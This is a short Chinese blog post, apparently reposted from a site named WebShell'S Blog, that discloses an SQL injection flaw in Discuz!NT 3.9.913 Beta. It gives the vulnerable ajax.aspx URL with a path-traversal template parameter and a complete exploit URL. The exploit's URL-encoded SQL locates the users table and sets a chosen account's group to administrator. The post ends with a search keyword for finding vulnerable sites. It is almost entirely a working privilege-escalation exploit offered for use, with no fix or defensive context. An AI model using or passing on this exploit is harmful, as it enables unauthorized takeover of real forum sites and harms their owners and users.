DNT存在SQL注入漏洞
注入地址:
http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1
利用:
http://nt.discuz.net/space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%20top%201%20name%20from%20sysobjects%20where%20name%20like%27%_users%27%20and%20xtype=%27U%27%29%20exec%28%27update%20%27%2b@t%2b%27%20set%20groupid=1%20where%20username=%27%27xxxxx%27%27%27%29--
关键字:Powered by Discuz!NT 3.9.913 Beta
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3123.html